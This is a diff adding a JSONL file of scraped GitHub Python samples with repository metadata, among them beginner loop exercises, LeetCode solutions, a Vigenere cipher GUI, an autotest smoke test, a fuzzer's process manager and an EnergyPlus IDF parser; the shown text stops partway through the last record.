diff --git "a/2652.jsonl" "b/2652.jsonl" new file mode 100644--- /dev/null +++ "b/2652.jsonl" @@ -0,0 +1,787 @@ +{"seq_id":"29311744400","text":"\nspam = 0\nwhile spam < 5: #While loop that ends with a condition\n print('Hello World')\n spam += 1\n\n\n\nname = ''\nwhile name != 'your name': #While loop\n print('Please type your name: ')\n name = input()\nprint('Thank You!')\n\n\n\nwhile True: # Infinite loop\n print('Please type your name: ')\n name = input()\n if name == 'your name':\n break #break exits the infinite loop\nprint('Thank You!')\n\n\nspam = 0\nwhile spam < 5:\n spam += 1\n print(spam)\n if spam == 3:\n continue #Jumps loop back to top\n print('Hello World')\n\n\n \n","repo_name":"rutrut6969/Automate-The-Boring-Stuff","sub_path":"While Loops.py","file_name":"While Loops.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28163803038","text":"import collections\n\n\ndef fourSumCount( A, B, C, D):\n # AB = collections.Counter(a + b for a in A for b in B)\n # return sum(AB[-c - d] for c in C for d in D)\n\n temp = [-a - b for a in A for b in B]\n AB = collections.Counter(temp)\n temp = [c + d for c in C for d in D]\n result = sum(AB[i] for i in temp)\n return result\n\n\n\n\nA = [ 1, 2]\nB = [-2,-1]\nC = [-1, 2]\nD = [ 0, 2]\n\nresult = fourSumCount(A, B, C, D)\nprint(result)","repo_name":"kobewangSky/LeetCode","sub_path":"454. 4Sum II.py","file_name":"454. 4Sum II.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27369502438","text":"import torch\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\nif __name__ == '__main__':\n attn_dir = \"attn_weight/hubert_asr_pre10_short\"\n attn_pths = [os.path.join(attn_dir, f\"layer{i}.pt\") for i in range(1)]\n prompt_len = 10\n\n for i in range(1):\n print(i)\n attn = torch.load(attn_pths[i]) # (1, 168, 168)\n attn = attn.squeeze(0).numpy() # (168, 168) (prompt_len + seq_len, prompt_len + seq_len)\n lambdas = []\n for j in range(attn.shape[0]):\n print(np.sum(attn[j][:prompt_len]))\n lambdas.append(np.sum(attn[j][:prompt_len]))\n","repo_name":"cyingliu/prompt-speech-ssl-model","sub_path":"s3prl/s3prl/analyze_attn.py","file_name":"analyze_attn.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"16340007479","text":"#\n#\nimport os\nimport platform\nimport re\nfrom autotest.client import test, utils\n\nclass ubuntu_fan_smoke_test(test.test):\n version = 1\n\n def install_required_pkgs(self):\n arch = platform.processor()\n try:\n series = platform.dist()[2]\n except AttributeError:\n import distro\n series = distro.codename()\n\n pkgs = [\n 'docker.io',\n 'gdb',\n 'git',\n 'net-tools',\n 'ubuntu-fan',\n ]\n\n cmd = 'yes \"\" | DEBIAN_FRONTEND=noninteractive apt-get install --yes --force-yes ' + ' '.join(pkgs)\n self.results = utils.system_output(cmd, retain_output=True)\n\n def initialize(self):\n pass\n\n def setup(self):\n self.install_required_pkgs()\n\n def determine_underlay(self):\n underlay = 'bogus'\n cmd = 'ip address'\n output = utils.system_output(cmd, retain_output=False)\n for line in output.split('\\n'):\n m = re.search('inet (\\d+\\.\\d+)\\.\\d+\\.\\d+\\/\\d+ brd \\d+\\.\\d+\\.\\d+\\.\\d+ scope', line)\n if m:\n underlay = '%s.0.0/16' % m.group(1)\n break\n return underlay\n\n def 
run_once(self, test_name):\n\n underlay = self.determine_underlay()\n\n os.chdir(self.bindir)\n cmd = './ubuntu_fan_smoke_test.sh %s' % (underlay)\n self.results = utils.system_output(cmd, retain_output=True)\n\n print(self.results)\n\n# vi:set ts=4 sw=4 expandtab syntax=python:\n","repo_name":"ColinIanKing/autotest-client-tests","sub_path":"ubuntu_fan_smoke_test/ubuntu_fan_smoke_test.py","file_name":"ubuntu_fan_smoke_test.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"73328920410","text":"import sys\n\nfrom phenix_apps.schedulers import SchedulerBase\n\n\nclass SingleNode(SchedulerBase):\n def __init__(self):\n SchedulerBase.__init__(self, 'single-node')\n\n spec = self.experiment.spec\n hosts = self.experiment.hosts\n\n for vm in spec.topology.nodes:\n hostname = vm.general.hostname\n\n if hostname in spec.schedules:\n continue\n\n spec.schedules.hostname = hosts[0].name\n\n print(self.experiment.to_json())\n\n\ndef main():\n SingleNode()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"sandialabs/sceptre-phenix-apps","sub_path":"src/python/phenix_apps/schedulers/single_node/single_node.py","file_name":"single_node.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"17999285737","text":"from dotenv import find_dotenv, load_dotenv\nimport os, json\n\n\n# INITIALIZING ENV VARIABLE TO MAKE ACCESSIBLE TO WHOLE APPLICATION\ndef env_var_config():\n # finding env file location / path\n dotenv_path = find_dotenv()\n\n # loading environment variables\n load_dotenv(dotenv_path)\n\n # returning env variables by converting in json\n env_variables = {\n \"upload\": os.getenv(\"ASSEMBLY_UPLOAD_URL\"),\n \"transcribe\": os.getenv(\"ASSEMBLY_TRANSCRIBE_URL\"),\n \"api_key\": os.getenv(\"ASSEMBLY_API_KEY\"),\n }\n\n return env_variables\n","repo_name":"mdazlaanzubair/odiotex-api-python","sub_path":"helpers/envConfig.py","file_name":"envConfig.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"24850750705","text":"from graphics import *\n\n\ndef encode_msg():\n width = 400\n height = 400\n win = GraphWin(\"Vigenere\", width, height)\n win.setBackground('light gray')\n\n text_pt1 = Point(75, 100)\n text1 = Text(text_pt1, \"Message to code: \")\n input_box1 = Entry(Point(250, 100), 30)\n input_box1.draw(win)\n text1.draw(win)\n text1.setTextColor(\"black\")\n\n text_pt = Point(100, 150)\n text = Text(text_pt, \"Enter Keyword: \")\n input_box = Entry(Point(250, 150), 20)\n input_box.draw(win)\n text.draw(win)\n text.setTextColor(\"black\")\n\n button = Rectangle(Point(150, 200), Point(300, 250))\n text2 = Text(Point(225, 225), 'Encode')\n button.setFill('white')\n button.draw(win)\n text2.draw(win)\n\n win.getMouse()\n button.undraw()\n text2.undraw()\n\n msg = input_box1.getText()\n key = input_box.getText()\n msg = msg.upper().replace(' ', '')\n key = key.upper().replace(' ', '')\n\n encoded_str = ''\n for i in range(len(msg)):\n msg_ord = (ord(msg[i])) - 65\n key_ord = (ord(key[i % len(key)])) - 65\n total = (msg_ord + key_ord) % 58\n new_ord = total + 65\n encoded_chr = (chr(new_ord))\n encoded_str = encoded_str + encoded_chr\n\n text3 = Text(Point(215, 225), encoded_str)\n text3.draw(win)\n\n msg = Text(Point(200, 350), 'Click anywhere to close')\n msg.draw(win)\n win.getMouse()\n 
win.close()\n\n\n\n\n\n","repo_name":"tgbzwt16/220","sub_path":"labs/lab6/lab6.py","file_name":"lab6.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42869968388","text":"#!/usr/bin/env python2\n\nimport signal\nimport random\n\nfrom multiprocessing import Process, Queue\n\nfrom . import clientfuzzerslave\nimport utils\n\n\ndef doFuzz(config, useCurses):\n \"\"\"\n Client Fuzzing main parent.\n\n this is the main entry point for project fuzzers\n receives data from fuzzing-children via queues\n \"\"\"\n q = Queue()\n # have to remove sigint handler before forking children\n # so ctlr-c works\n orig = signal.signal(signal.SIGINT, signal.SIG_IGN)\n\n inputs = utils.loadInputs(config)\n\n procs = []\n n = 0\n\n if \"fuzzer_nofork\" in config and config[\"fuzzer_nofork\"]:\n r = random.randint(0, 2**32 - 1)\n fuzzingSlave = clientfuzzerslave.FuzzingSlave(config, n, q, r)\n fuzzingSlave.doActualFuzz()\n else:\n while n < config[\"processes\"]:\n print(\"Start child: \" + str(n))\n r = random.randint(0, 2**32 - 1)\n fuzzingSlave = clientfuzzerslave.FuzzingSlave(config, n, q, r, inputs)\n p = Process(target=fuzzingSlave.doActualFuzz, args=())\n procs.append(p)\n p.start()\n n += 1\n\n # restore signal handler\n signal.signal(signal.SIGINT, orig)\n\n print(\"Thread# Fuzz/s Count Crashes\")\n while True:\n try:\n r = q.get()\n print(\"%d: %4.2f %8d %5d\" % r)\n except KeyboardInterrupt:\n # handle ctrl-c\n for p in procs:\n p.terminate()\n p.join()\n\n break\n\n print(\"Finished\")\n","repo_name":"dobin/ffw","sub_path":"clientfuzzer/clientfuzzermaster.py","file_name":"clientfuzzermaster.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"32"} +{"seq_id":"32854816113","text":"from sys import stdin, stdout\r\n\r\ntc = int(stdin.readline())\r\nwhile tc:\r\n tc -= 1\r\n n, player = map(int, stdin.readline().split())\r\n if n == 1:\r\n if player == 0:\r\n print(\"Airborne wins.\")\r\n if player == 1:\r\n print(\"Pagfloyd wins.\")\r\n else:\r\n if player == 1:\r\n print(\"Pagfloyd wins.\")\r\n else:\r\n print(\"Airborne wins.\")","repo_name":"OmkarSharan/Spoj","sub_path":"Hubullu.py","file_name":"Hubullu.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9946679190","text":"class Solution:\n def topKFrequent(self, words: List[str], k: int) -> List[str]:\n counter = Counter(words)\n heap = []\n \n for key, count in counter.items():\n heappush(heap, [-1 *count, key])\n \n answer = []\n for i in range(k):\n count, key = heappop(heap)\n answer.append(key)\n \n return answer","repo_name":"Gizaw-Agodo/A2sV","sub_path":"0692-top-k-frequent-words/0692-top-k-frequent-words.py","file_name":"0692-top-k-frequent-words.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"40260297169","text":"# from sklearn.model_selection import train_test_split\n# from sklearn import metrics\n# from sklearn.feature_extraction.text import CountVectorizer,TfidfTransformer\nfrom pandas import read_csv\nfrom sklearn.externals import joblib\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import accuracy_score\n\nimport 
sys\n\nsys.path.append('.')\nsys.path.append('../')\nsys.path.append('../../')\nfrom config.config import cfg\n\n\nclass XgboostPredict:\n\n def predict(self, csv_file):\n pkl_file = cfg.xgboost.pkl_file\n dataset = read_csv(csv_file, index_col=0)\n classes = cfg.xgboost.classes\n X = dataset.iloc[:, 1:]\n y = dataset.iloc[:, 0]\n x_test = X\n y_test = y\n with open(pkl_file, 'rb') as f:\n model = joblib.load(f)\n\n def confusion_accuracy(x_test, y_true, model):\n y_pred = model.predict(x_test)\n cm = confusion_matrix(y_true=y_true, y_pred=y_pred)\n cr = classification_report(y_true=y_true, y_pred=y_pred)\n acc = accuracy_score(y_true=y_true, y_pred=y_pred)\n print('Model name:', model.__class__.__name__)\n print(model.__class__.__name__ + ' confusion_matrix:\\n', cm)\n print(model.__class__.__name__ + ' classification_report:\\n', cr)\n print(model.__class__.__name__ + ' classification_report:', acc)\n print(\n model.__class__.__name__ + ' classification_report: predict {}, accuracy {}'.format(classes[y_pred[0]],\n acc))\n return classes[y_pred[0]]\n\n return confusion_accuracy(x_test, y_test, model)\n","repo_name":"WyHy/Pathological_Cell_Tracker","sub_path":"models/xgboost/xgboost_predict.py","file_name":"xgboost_predict.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23477478806","text":"'''\nhttps://www.acmicpc.net/problem/7568\n덩치 (Bulk)\n[Solution]\n'''\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\nhuge = [list(map(int, input().split())) for _ in range(n)]\nscore = [[huge[idx][0] < huge[jdx][0] and huge[idx][1] < huge[jdx][1] for jdx in range(n)].count(True) for idx in range(n)]\nprint(*[s+1 for s in score], end=' ')\n","repo_name":"sangmandu/SangSangPlus","sub_path":"Algorithm/SANGMIN/CLASS 2/7568.py","file_name":"7568.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"30006175974","text":"class Solution(object):\n def merge(self, intervals):\n \"\"\"\n :type intervals: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n if len(intervals) <=1:\n return intervals\n \n def get_first(a_list):\n return a_list[0]\n intervals.sort(key=get_first)\n\n result = [intervals[0]]\n for i in range(1,len(intervals)):\n if result[-1][1] >= intervals[i][0]:\n result[-1] = [result[-1][0],max(result[-1][1],intervals[i][1])]\n else:\n result.append(intervals[i])\n return result\n\ns = Solution()\nresult = s.merge([[1,4],[0,4]])\nprint(result)\n ","repo_name":"JoanWu5/Leetcode-Solution","sub_path":"56-Merge-Intervals.py","file_name":"56-Merge-Intervals.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25942363291","text":"# You have two input files. One is practice.txt\n# and the other is data.txt. Some expected answers\n# for practice.txt are provided here in this\n# file. You will have to answer the questions\n# on Blackboard using data.txt.\n\n# Complete coding for this file using the data\n# in practice.txt. Check if the results match\n# with the results provided in the comments.\n\n# Answer the questions on Blackboard using\n# the data.txt file as the input data. 
Submit\n# the completed code file on Blackboard.\n\nimport pandas as pd\nimport numpy as np\n# Create a dataframe from csv\ndf = pd.read_csv('practice.txt', delimiter='\\t')\n\nmyData = df.values\n\ndef minMaxVec(vec1,vec2):\n #for jaccard\n minimums=[]\n maximums=[]\n for i in range(0, len(vec1)):\n minimums.append(min( vec1[i] , vec2[i]))\n for i in range(0, len(vec1)):\n maximums.append(max( vec1[i] , vec2[i]))\n return minimums, maximums\n\n\ndef euclid(vec1, vec2):\n ### Write your code here and return an appropriate value\n euclidean_dist = np.sqrt(np.sum((vec1-vec2)**2))\n return euclidean_dist\n #return None\n\ndef manhattan_distance(vec1, vec2):\n ### Write your code here and return an appropriate value\n man_dist = np.sum(abs(vec1-vec2))\n return man_dist\n #return None\n\ndef jaccard(vec1, vec2):\n ### Write your code here and return an appropriate value\n minimums, maximums = minMaxVec(vec1,vec2)\n jaccard = sum(minimums)/sum(maximums);\n return jaccard\n #return None\n\ndef cosine(vec1, vec2):\n ### Write your code here and return an appropriate value\n numerator = np.dot(vec1 , vec2)\n denominator = np.sqrt(sum(vec1**2))* np.sqrt(sum(vec2**2))\n cosinesim = numerator/denominator\n return cosinesim\n #return None\n\ndef tanimoto(vec1, vec2):\n ### Write your code here and return an appropriate value\n numerator = np.dot( vec1 , vec2)\n denominator = (sum(vec1**2)+sum(vec2**2))-numerator\n tanimoto = numerator/denominator\n return tanimoto\n #return None\n\ndef sortkey(item):\n return item[1]\n\ndef knearest(vec, data, k, method):\n # Write code to return the indices of k nearest\n # neighbors of vec in data using method\n result = []\n if method == \"euclidean\":\n for row in range (0, len(data)):\n distance = euclid(vec, data[row])\n result.append([row, distance])\n elif method == \"manhattan\":\n for row in range (0, len(data)):\n distance = manhattan_distance(vec, data[row])\n result.append([row, distance])\n sortedResult = sorted(result, key=sortkey)\n indicies = []\n if k str:\n l = clear_list(l)\n l_str = \" \".join(l)\n return re.sub(' +', ' ', l_str)","repo_name":"lambdina/scraping_engine","sub_path":"scraping_engine/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71739422490","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n\n\n@Date : Fri Nov 14 13:20:38 2014 \\n\n@Author : Erwan Ledoux \\n\\n\n\n\n\nThe Conditioner\n\n\"\"\"\n\n\n#\nimport ShareYourSystem as SYS\nBaseModuleStr=\"ShareYourSystem.Standards.Objects.Debugger\"\nDecorationModuleStr=\"ShareYourSystem.Standards.Classors.Representer\"\nSYS.setSubModule(globals())\n#\n\n#\nRepresenter=DecorationModule\n#\n\n#\n@DecorationClass()\nclass ConditionerClass(BaseClass):\n\n\t#Definition\n\tRepresentingKeyStrsList=[\n\t\t\t\t\t\t\t\t\t'ConditioningTestVariable',\n\t\t\t\t\t\t\t\t\t'ConditioningGetBoolFunction',\n\t\t\t\t\t\t\t\t\t'ConditioningAttestVariable',\n\t\t\t\t\t\t\t\t\t'ConditioningInstanceVariable',\n\t\t\t\t\t\t\t\t\t'ConditioningTypesList',\n\t\t\t\t\t\t\t\t\t'ConditionedIsBool',\n\t\t\t\t\t\t\t\t]\n\t\n\tdef default_init(self,\n\t\t\t\t\t\t_ConditioningTestVariable=None,\n\t\t\t\t\t\t_ConditioningGetBoolFunction=None,\n\t\t\t\t\t\t_ConditioningAttestVariable=None,\n\t\t\t\t\t\t_ConditioningInstanceVariable=None,\n\t\t\t\t\t\t_ConditioningTypesList=[type(len),type(type)],\n\t\t\t\t\t\t_ConditionedIsBool=True,\n\t\t\t\t\t\t**_KwargVariablesDict\n\t\t\t\t\t):\n\t\t\n\t\t#Call 
the parent init method\n\t\tBaseClass.__init__(self,**_KwargVariablesDict)\n\t\t\n\tdef do_condition(self):\n\n\t\t#debug\n\t\tself.debug(\n\t\t\t\t('self.',self,[\n\t\t\t\t\t'ConditioningInstanceVariable',\n\t\t\t\t\t'ConditioningTestVariable'\n\t\t\t\t])\n\t\t\t)\n\n\t\t#Check\n\t\tif self.ConditioningInstanceVariable!=None:\n\n\t\t\t#Check\n\t\t\tif self.ConditioningTestVariable in self.ConditioningTypesList:\n\n\t\t\t\t#call\n\t\t\t\tself.ConditioningTestVariable=self.ConditioningTestVariable(\n\t\t\t\t\t\tself.ConditioningInstanceVariable\n\t\t\t\t\t)\n\n\t\t\telse:\n\t\t\t\t\n\t\t\t\t#try\n\t\t\t\ttry:\n\n\t\t\t\t\t#get\n\t\t\t\t\tself.ConditioningTestVariable=self.ConditioningInstanceVariable[\n\t\t\t\t\t\tself.ConditioningTestVariable\n\t\t\t\t\t]\n\n\t\t\t\texcept:\n\n\t\t\t\t\t#pass\n\t\t\t\t\tpass\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(('self.',self,[\n\t\t\t\t\t\t\t\t\t'ConditioningTestVariable',\n\t\t\t\t\t\t\t\t\t'ConditioningAttestVariable'\n\t\t\t\t\t\t\t\t]))\n\t\t'''\n\t\t\n\t\t#call\n\t\tself.ConditionedIsBool=self.ConditioningGetBoolFunction(\n\t\t\tself.ConditioningTestVariable,\n\t\t\tself.ConditioningAttestVariable\n\t\t)\n\n\t\t#debug\n\t\t'''\n\t\tself.debug(('self.',self,['ConditionedIsBool']))\n\t\t'''\n\t\t\n#\n\n","repo_name":"Ledoux/ShareYourSystem","sub_path":"Pythonlogy/draft/Conditioner/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8810533483","text":"from dal import autocomplete, forward\nfrom .models import fechaCalendario, CategoryStudy, etiquetasCar\nfrom django import forms\n\n\nclass fechaCalendarioForm(forms.ModelForm):\n\n class Meta:\n model = fechaCalendario\n fields = ('fechaCa', )\n # widgets = {\n # 'fechaCalendario': autocomplete.ModelSelect2Multiple(\n # url='linked_data_rf',\n # forward=(forward.Field(src=\"cat_estudio\", dst=\"possessor\"),\n # forward.Const(val=42, dst=\"secret\"))\n # )\n # }\n\n# Etiquetas Cartelera\nclass EtiquetasCartForm(forms.ModelForm):\n\n class Meta:\n model = etiquetasCar\n fields = ('name', 'cat_estudio')\n widgets = {\n 'cat_estudio': autocomplete.ModelSelect2Multiple(\n # url='linked_data_rf',\n forward=(forward.Field(src=\"cat_estudio\", dst=\"possessor\"),\n forward.Const(val=42, dst=\"secret\"))\n )\n }\n\nclass AutocompleteEtiquetasForm(forms.ModelForm):\n\n class Meta:\n model = etiquetasCar\n fields = ('__all__')\n widgets = {\n 'etiquetasCartelera': autocomplete.ModelSelect2Multiple(\n 'etiquetasCartelera-autocomplete'\n )\n }","repo_name":"Rood17/CAWebApp","sub_path":"cartelera/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24586576568","text":"import os, copy, time,subprocess,traceback\nFD = os.path.dirname(os.path.realpath(__file__))\nEPLUS_PATH = {'8_3':FD + '/../../eplus-env/eplus_env/envs/EnergyPlus-8-3-0'}\nWEATHER_PATH_DF = FD + '/../../eplus-env/eplus_env/envs/weather/pittsburgh.epw'\n\nclass IdfParser(object):\n\n\tdef __init__(self, idf_dir, version='8_3'):\n\t\tself._idf_dir = idf_dir;\n\t\t# idf_dict is:\n\t\t# {idf_class_name:[obj_content_str, obj_content_str]}\n\t\tself._idf_dict = {};\n\t\tself._version = version;\n\t\tself._parser_idf();\n\n\tdef _parser_idf(self):\n\t\twith open(self._idf_dir, 'r') as idf_file:\n\t\t\tidf_lines = idf_file.readlines();\n\t\t\tis_obj_start = False;\n\t\t\tobj_content = 
'';\n\t\t\tobj_name = '';\n\t\t\tfor idf_line in idf_lines:\n\t\t\t\tidf_line_prcd = idf_line.split('\\n')[0].split('!')[0].strip();\n\t\t\t\tif is_obj_start == False:\n\t\t\t\t\tif len(idf_line_prcd) > 0:\n\t\t\t\t\t\tif idf_line_prcd[-1] == ',':\n\t\t\t\t\t\t\tobj_name = idf_line_prcd[:-1];\n\t\t\t\t\t\t\tis_obj_start = True;\n\t\t\t\t\t\telif idf_line_prcd[-1] == ';':\n\t\t\t\t\t\t\tobj_name = idf_line_prcd[0:idf_line_prcd.find(',')];\n\t\t\t\t\t\t\tobj_content = idf_line_prcd[idf_line_prcd.find(',') + 1:];\n\t\t\t\t\t\t\tif obj_name in self._idf_dict:\n\t\t\t\t\t\t\t\tself._idf_dict[obj_name].append(obj_content);\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tself._idf_dict[obj_name] = [obj_content];\n\t\t\t\t\t\t\t# Reset obj temp fields\n\t\t\t\t\t\t\tis_obj_start = False;\n\t\t\t\t\t\t\tobj_content = '';\n\t\t\t\t\t\t\tobj_name = '';\n\t\t\t\telse:\n\t\t\t\t\tobj_content += idf_line;\n\t\t\t\t\tif len(idf_line_prcd) > 0:\n\t\t\t\t\t\tif idf_line_prcd[-1] == ';':\n\t\t\t\t\t\t\tif obj_name in self._idf_dict:\n\t\t\t\t\t\t\t\tself._idf_dict[obj_name].append(obj_content);\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tself._idf_dict[obj_name] = [obj_content];\n\t\t\t\t\t\t\t# Reset obj temp fields\n\t\t\t\t\t\t\tis_obj_start = False;\n\t\t\t\t\t\t\tobj_content = '';\n\t\t\t\t\t\t\tobj_name = '';\n\n\tdef write_idf(self, to_write_dir):\n\t\tto_write_str = '';\n\t\t# Construct the string to write\n\t\tfor idf_obj_name in self._idf_dict:\n\t\t\tobj_contents = self._idf_dict[idf_obj_name];\n\t\t\tfor obj_content in obj_contents:\n\t\t\t\tto_write_str += idf_obj_name + ',\\n';\n\t\t\t\tto_write_str += obj_content + '\\n';\n\t\twith open(to_write_dir, 'w') as idf_file:\n\t\t\tidf_file.write(to_write_str);\n\n\tdef write_object_in_idf(self, to_write_dir, object_name):\n\t\tto_write_str = '';\n\t\t# Construct the string to write\n\t\tobj_contents = self._idf_dict[object_name];\n\t\tfor obj_content in obj_contents:\n\t\t\tto_write_str += object_name + ',\\n';\n\t\t\tto_write_str += obj_content + '\\n';\n\t\twith open(to_write_dir, 'w') as idf_file:\n\t\t\tidf_file.write(to_write_str);\n\n\n\tdef remove_objects_all(self, class_name):\n\t\tself._idf_dict.pop(class_name);\n\n\tdef get_obj_reference_count(self, obj_name):\n\t\tref_ct = 0;\n\t\tfor key, value in self._idf_dict.items():\n\t\t\tfor obj in value:\n\t\t\t\tobj_lines = obj.split(',')[1: ] # Exclude the obj name itself from the reference\n\t\t\t\tfor obj_line in obj_lines:\n\t\t\t\t\t# Remove \\n \n\t\t\t\t\tnl_sps = obj_line.split('\\n');\n\t\t\t\t\tnl_free = nl_sps[1] if len(nl_sps) > 2 else nl_sps[-1]; # Handle the line with ;\n\t\t\t\t\teffc_obj_line = nl_free.split(';')[0].strip();\n\t\t\t\t\tif obj_name == effc_obj_line: \n\t\t\t\t\t\tref_ct += 1;\n\t\treturn ref_ct;\n\n\n\tdef remove_object(self, class_name, obj_name):\n\t\ttry:\n\t\t\ttgt_objects = self._idf_dict[class_name];\n\t\t\ttgt_idx = 0;\n\t\t\tfor obj in tgt_objects:\n\t\t\t\tobj_name_this = self.get_object_name(obj);\n\t\t\t\tif obj_name_this == obj_name:\n\t\t\t\t\tbreak;\n\t\t\t\telse:\n\t\t\t\t\ttgt_idx += 1;\n\t\t\tself._idf_dict[class_name].pop(tgt_idx);\n\t\texcept Exception as e:\n\t\t\tprint('Func: remove_object, args:(%s, %s), error: %s'%(class_name, obj_name, traceback.format_exc()))\n\n\tdef get_object_name(self, object_content):\n\t\tobj_name = object_content.split(',')[0].split('\\n')[-1].strip();\n\t\treturn obj_name;\n\n\tdef get_schedule_type_init_value(self, schedule_name):\n\t\tschedule_content = None;\n\t\tfor cmp_schedule_content in 
self._idf_dict['Schedule:Compact']:\n\t\t\tif self.get_object_name(cmp_schedule_content) == schedule_name:\n\t\t\t\tschedule_content = cmp_schedule_content;\n\t\t\t\tbreak;\n\t\tschedule_content = schedule_content.split(';')[0].split(',');\n\t\tschedule_type = schedule_content[1].split('\\n')[-1].strip();\n\t\t# Schedule init value\n\t\tfor schedule_line_i in schedule_content[2:]:\n\t\t\ttry:\n\t\t\t\tinit_value = float(schedule_line_i.split('\\n')[-1].strip());\n\t\t\t\tbreak;\n\t\t\texcept Exception as e:\n\t\t\t\tpass;\n\t\treturn (schedule_type, init_value);\n\n\n\tdef get_all_compact_schedules_names(self):\n\t\treturned_list = [];\n\t\tfor cmp_schedule_content in self._idf_dict['Schedule:Compact']:\n\t\t\treturned_list.append(self.get_object_name(cmp_schedule_content));\n\t\treturn returned_list;\n\n\tdef localize_schedule(self, local_file_path):\n\t\tfile_name = local_file_path.split(os.sep)[-1];\n\t\tfile_dir = local_file_path[:local_file_path.rfind(os.sep)];\n\t\tsch_file_contents = self._idf_dict['Schedule:File'];\n\t\tcontent_i = 0;\n\t\tfor sch_file_obj in copy.deepcopy(sch_file_contents):\n\t\t\tif file_name in sch_file_obj:\n\t\t\t\tfile_name_st_idx = sch_file_obj.rfind(file_name);\n\t\t\t\tfull_path_st_idx = sch_file_obj.rfind(',', 0, file_name_st_idx);\n\t\t\t\tsch_file_obj = sch_file_obj[0:full_path_st_idx] + ',\\n' + file_dir + '/' + sch_file_obj[file_name_st_idx:];\n\t\t\t\tsch_file_contents[content_i] = sch_file_obj;\n\t\t\tcontent_i += 1;\n\t\tself._idf_dict['Schedule:File'] = sch_file_contents;\n\n\tdef is_contain_filesch(self):\n\t\tresult = 'Schedule:File' in self._idf_dict\n\t\treturn (result);\n\n\tdef add_objects(self, dict_to_add):\n\t\tfor key in dict_to_add:\n\t\t\tobjects_to_add = dict_to_add[key];\n\t\t\tif key in self._idf_dict:\n\t\t\t\tself._idf_dict[key].extend(objects_to_add);\n\t\t\telse:\n\t\t\t\tself._idf_dict[key] = objects_to_add;\n\n\tdef add_dxf_output(self):\n\t\tself._idf_dict['Output:Surfaces:Drawing'] = ['DXF,!- Report Type\\n'+\n\t\t\t\t\t\t\t\t\t\t\t\t\t 'Triangulate3DFace;\\n'];\n\n\tdef set_minimum_run(self):\n\t\tself._idf_dict['SimulationControl'] = ['Yes,!- Do Zone Sizing Calculation\\n' +\n \t\t\t\t\t\t\t\t\t'No,!- Do System Sizing Calculation\\n' +\n 'No,!- Do Plant Sizing Calculation\\n' +\n \t\t\t\t\t\t\t\t\t'No,!- Run Simulation for Sizing Periods\\n' +\n \t\t\t\t\t\t\t\t\t'No;!- Run Simulation for Weather File Run Periods\\n'];\n\t\tif 'Schedule:File' in self._idf_dict:\n\t\t\tself._idf_dict.pop('Schedule:File', None);\n\n\tdef run_eplus_minimum(self, out_dir):\n\t\teplus_path_this = EPLUS_PATH[self._version];\n\t\tif not os.path.isdir(FD + '/tmp'):\n\t\t\tos.makedirs(FD + '/tmp');\n\t\tidf_dir = FD + '/tmp/%s.idf'%(time.time());\n\t\tself.write_idf(idf_dir);\n\t\tprint ('%s -w %s -d %s %s'\n\t\t\t\t\t\t%(eplus_path_this + '/energyplus', WEATHER_PATH_DF, \n out_dir, idf_dir))\n\t\teplus_process = subprocess.call('%s -w %s -d %s %s'\n\t\t\t\t\t\t%(eplus_path_this + '/energyplus', WEATHER_PATH_DF, \n out_dir, idf_dir),\n shell = True,\n stdout = subprocess.PIPE,\n stderr = subprocess.PIPE,\n preexec_fn=os.setsid)\n\n\n \n\n\n\n\t@property\n\tdef idf_dict(self):\n\t\treturn self._idf_dict\n\t\n\n\n\n\n\n\n","repo_name":"zhangzhizza/HVAC-RL-Control","sub_path":"src/eplus-env-util/eplus_env_util/idf_parser.py","file_name":"idf_parser.py","file_ext":"py","file_size_in_byte":6831,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"32"} +{"seq_id":"8650228215","text":"# pessoa = {chave: 
